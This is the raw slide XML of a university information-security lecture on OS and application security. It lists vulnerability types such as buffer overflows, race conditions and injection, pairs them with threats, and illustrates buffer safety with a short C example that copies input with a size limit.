    <dgm:cxn modelId="{83F446D4-0534-4FBA-A325-F84C735D2896}" type="presParOf" srcId="{6E3FE9C1-657E-4317-AB00-53B08193C21E}" destId="{A654E0A0-8458-4F95-ACB8-35E34E8D7677}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess2"/>
    <dgm:cxn modelId="{A3C93DF7-1602-4C22-B459-72EEEDB33797}" type="presParOf" srcId="{A654E0A0-8458-4F95-ACB8-35E34E8D7677}" destId="{991E66B5-0A49-4396-A817-A4CB2746316A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1D3395-61A3-4E1E-9853-513271975A2A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="-4593403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FEFBEB-FBD6-4490-B92E-48D80EE84F7D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="285089" y="184749"/>
          <a:ext cx="5756656" cy="369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161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Buffer overflow vulnerabilities</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="285089" y="184749"/>
        <a:ext cx="5756656" cy="369336"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A455889E-30F2-4920-B44F-0A5F0FBC2110}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="54254" y="138582"/>
          <a:ext cx="461670" cy="461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F85769-C50F-4DB7-8364-D7A942EB34FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="619556" y="739079"/>
          <a:ext cx="5422188" cy="369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161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Input validation problem </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="619556" y="739079"/>
        <a:ext cx="5422188" cy="369336"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4073CC3C-F7BA-4278-96D4-A2BEB6E8CF38}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="388721" y="692912"/>
          <a:ext cx="461670" cy="461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076F78-B8C6-4EC3-AA73-9B4274B71A20}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="802843" y="1293002"/>
          <a:ext cx="5238902" cy="369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161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Race conditions</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="802843" y="1293002"/>
        <a:ext cx="5238902" cy="369336"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{150BD863-2674-4883-B6A8-37BD9CC697E2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="572007" y="1246835"/>
          <a:ext cx="461670" cy="461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361290-EDFD-458D-9C67-FE89E136D465}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="861364" y="1847331"/>
          <a:ext cx="5180380" cy="369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161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Authentication mechanism not properly implemented</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="861364" y="1847331"/>
        <a:ext cx="5180380" cy="369336"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{24895F11-A1B2-4BC5-AF6B-13D04F03AC5F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="630529" y="1801164"/>
          <a:ext cx="461670" cy="461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CBC898-3124-4387-8344-ED9EA123F183}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="802843" y="2401661"/>
          <a:ext cx="5238902" cy="369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161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Authorization mechanism not properly implemented </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="802843" y="2401661"/>
        <a:ext cx="5238902" cy="369336"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9B88B8C5-7E16-4977-BE32-BFF84A363751}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="572007" y="2355494"/>
          <a:ext cx="461670" cy="461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828D89-2771-4E52-868C-B35EF33CC196}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="619556" y="2955584"/>
          <a:ext cx="5422188" cy="369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161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Cryptographic mechanisms not properly implemented</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="619556" y="2955584"/>
        <a:ext cx="5422188" cy="369336"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8F59C56C-C875-4FF7-8259-62871BE3A488}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="388721" y="2909417"/>
          <a:ext cx="461670" cy="461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EC094D-C2DF-4268-8314-17D10D51D94F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="285089" y="3509914"/>
          <a:ext cx="5756656" cy="369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161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Human error, lack of knowledge, bad decisions</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="285089" y="3509914"/>
        <a:ext cx="5756656" cy="369336"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CB565FAA-30EE-42E9-83F1-5FE15CEE540C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="54254" y="3463747"/>
          <a:ext cx="461670" cy="461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A42382-57CB-415B-83D2-52B954704E18}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="883" y="0"/>
          <a:ext cx="2297534" cy="45466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Software Vulnerabilities</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="883" y="0"/>
        <a:ext cx="2297534" cy="1363980"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D9B3A439-7AC7-4E3A-9D34-38FA728694DF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="230637" y="1363980"/>
          <a:ext cx="1838027" cy="29552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55245" rIns="7366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Buffer overflow</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="284471" y="1417814"/>
        <a:ext cx="1730359" cy="2847622"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{497834C8-0E17-4D49-9C74-3B1EA73DA4AD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2470732" y="0"/>
          <a:ext cx="2297534" cy="45466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Web Vulnerabilities</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2470732" y="0"/>
        <a:ext cx="2297534" cy="1363980"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FBC785BF-5179-46BA-BA75-3BEA3D487073}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2700486" y="1363980"/>
          <a:ext cx="1838027" cy="29552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55245" rIns="7366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Scripting attacks</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2754320" y="1417814"/>
        <a:ext cx="1730359" cy="2847622"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6171C9D8-D033-40A9-A1B7-AADF86865795}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4940582" y="0"/>
          <a:ext cx="2297534" cy="45466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Database Vulnerabilities</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4940582" y="0"/>
        <a:ext cx="2297534" cy="1363980"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{991E66B5-0A49-4396-A817-A4CB2746316A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5170335" y="1363980"/>
          <a:ext cx="1838027" cy="29552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55245" rIns="7366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SQL Injection attacks</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5224169" y="1417814"/>
        <a:ext cx="1730359" cy="28476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1D197E-49A8-45D6-9595-24752F3CD4E1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56727D-4B97-405F-B766-70E8F2FC26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5381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CC214-F561-4272-923A-4644FF8C722F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4E1F6F-3F2F-4878-A668-46EF360EC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19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eracode.com/security/race-condition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685803" y="4415790"/>
            <a:ext cx="5486399" cy="418338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37" name="Shape 37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4079923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904877" y="4706938"/>
            <a:ext cx="4970461" cy="4460875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42950"/>
            <a:ext cx="4954587" cy="37163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922883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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904877" y="4706938"/>
            <a:ext cx="4970461" cy="4460875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41" name="Shape 241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42950"/>
            <a:ext cx="4954587" cy="37163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014327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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="904877" y="4706938"/>
            <a:ext cx="4970461" cy="4460875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48" name="Shape 248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42950"/>
            <a:ext cx="4954587" cy="37163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4098722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E1F6F-3F2F-4878-A668-46EF360ECF1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8188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Race condition: a system is forced to simultaneously perform two tasks that are designed to perform sequentially.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>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technique takes advantage of a time gap between the moment a service is initiated and the moment a security control takes effect. This attack, which depends on multithreaded applications, can be delivered in one of two ways: interference caused by untrusted processes (essentially a piece of code that slips into a sequence between steps of a secure programs), and interference caused by a trusted process, which may have the "same'' privileges. Without proper controls, different processes can interfere with each other. Other names used to refer to this vulnerability include Time of Check/Time of Use or TOC/TOU attacks. &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.veracode.com/security/race-condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;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E1F6F-3F2F-4878-A668-46EF360ECF1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164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E1F6F-3F2F-4878-A668-46EF360ECF1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5031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E1F6F-3F2F-4878-A668-46EF360ECF1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5606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E1F6F-3F2F-4878-A668-46EF360ECF1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30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612ECF8-A45A-404B-A46A-CDF24746626E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="575F6D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/12/2019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5969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>
                <a:solidFill>
                  <a:srgbClr val="575F6D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/12/2019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833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713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71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>
                <a:solidFill>
                  <a:srgbClr val="575F6D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/12/2019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2635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F0E6D8-4E7F-4F7A-A975-B66012B4531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E88A4-27AB-4BEE-8E91-E12EEF46A033}" type="datetimeFigureOut">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="575F6D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/12/2019</a:t>
            </a:fld>
            <a:endParaRPr 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311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8229600" cy="1866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000500"/>
            <a:ext cx="8229600" cy="1866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D7F549-17AD-40CC-8519-FE462688301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C8A6A-8C7A-46E0-8FF1-697E181CC731}" type="datetimeFigureOut">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="575F6D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/12/2019</a:t>
            </a:fld>
            <a:endParaRPr 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8790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8229600" cy="1866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00500"/>
            <a:ext cx="8229600" cy="1866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864010-BCDF-4C11-B5B0-8C69AD9A138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FA0AA-390A-4D38-9872-2E5FAF247694}" type="datetimeFigureOut">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="575F6D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/12/2019</a:t>
            </a:fld>
            <a:endParaRPr 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0755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50FD33-F06C-4593-BD9C-07790445C85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5B9C1-8500-4A74-AF48-96C11EB6C2CC}" type="datetimeFigureOut">
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="575F6D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/12/2019</a:t>
            </a:fld>
            <a:endParaRPr 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856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612ECF8-A45A-404B-A46A-CDF24746626E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="575F6D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/12/2019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347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612ECF8-A45A-404B-A46A-CDF24746626E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFF39D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/12/2019</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFF39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>
              <a:solidFill>
                <a:srgbClr val="FFF39D"/>
              </a:solidFill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5914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>
                <a:solidFill>
                  <a:srgbClr val="575F6D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/12/2019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44681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>
                <a:solidFill>
                  <a:srgbClr val="575F6D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/12/2019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5592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612ECF8-A45A-404B-A46A-CDF24746626E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="575F6D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/12/2019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56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>
                <a:solidFill>
                  <a:srgbClr val="575F6D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/12/2019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383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612ECF8-A45A-404B-A46A-CDF24746626E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="575F6D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/12/2019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0358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612ECF8-A45A-404B-A46A-CDF24746626E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="575F6D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/12/2019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252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612ECF8-A45A-404B-A46A-CDF24746626E}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="575F6D"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>11/12/2019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D34FDBB-9C4C-4D67-9428-25781F931C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696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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2857552" y="3124201"/>
            <a:ext cx="4629149" cy="1893887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91425" tIns="45700" rIns="91425" bIns="45700" rtlCol="0" anchor="b" anchorCtr="0"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buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" cap="small" dirty="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INFORMATION SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Shape 34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2857502" y="5003904"/>
            <a:ext cx="4967229" cy="1371599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91425" tIns="45700" rIns="91425" bIns="45700" rtlCol="0" anchor="t" anchorCtr="0"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25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="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OS and Application  Security (Chapters 9 and 10)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25000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="dk2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25000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk2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</p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374552636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Vulnerabilities and threats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85704888"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1600200"/>
          <a:ext cx="746760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3800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1417213166"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3733800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="7364733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Vulnerabilities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Threats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5492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Input validation problem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Buffer overflow attack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6044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Buffer not</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> properly checked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Buffer overflow</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> attack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1127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Race conditions*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Race condition</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> attacks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53266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Input validation problem in web design/database design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Injection attacks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52742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Human error/bad decision etc.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Social engineering attacks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49678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5752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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Injection Attacks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192173318"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="685800" y="1397000"/>
          <a:ext cx="7239000" cy="4546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7802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Buffer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A buffer contains data that is stored for a short amount of time, typically in the computer's memory (RAM).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purpose of a buffer is to hold data right before it is used. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25825270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Buffer Overflow: Basic idea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Enter very large input strings to overflow a buffer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If the OS cannot handle buffer overflow it can crash.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is possible to inject malicious code inside the overflown buffer.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6500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9762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953000" y="914400"/>
            <a:ext cx="3733800" cy="57150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Unsafe function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() copies an input into a buffer without checking whether the buff has enough space to hold the input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker may enter a large input that includes malicious code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>When the buffer overflows, the malicious code can be copied in the memory space adjacent to the buffer.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04800" y="1143000"/>
            <a:ext cx="4343400" cy="33528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400" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>tdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>, char * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>      //create a buffer on the stack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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> buff[100];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>//Only copies as much of the argument as can fit in the buffer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcopy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>[1], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(buff));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>//Print the content of the buffer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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(“%s\n”, buff);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return 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>}</a:t>
            </a:r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20895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968"/>
            <a:ext cx="838200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Dangerous situation when attack can occur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838200" y="609600"/>
            <a:ext cx="1981200" cy="5410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33400" y="609600"/>
            <a:ext cx="228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dirty="0" smtClean="0"/>
              <a:t>Previous</a:t>
            </a:r>
            <a:r>
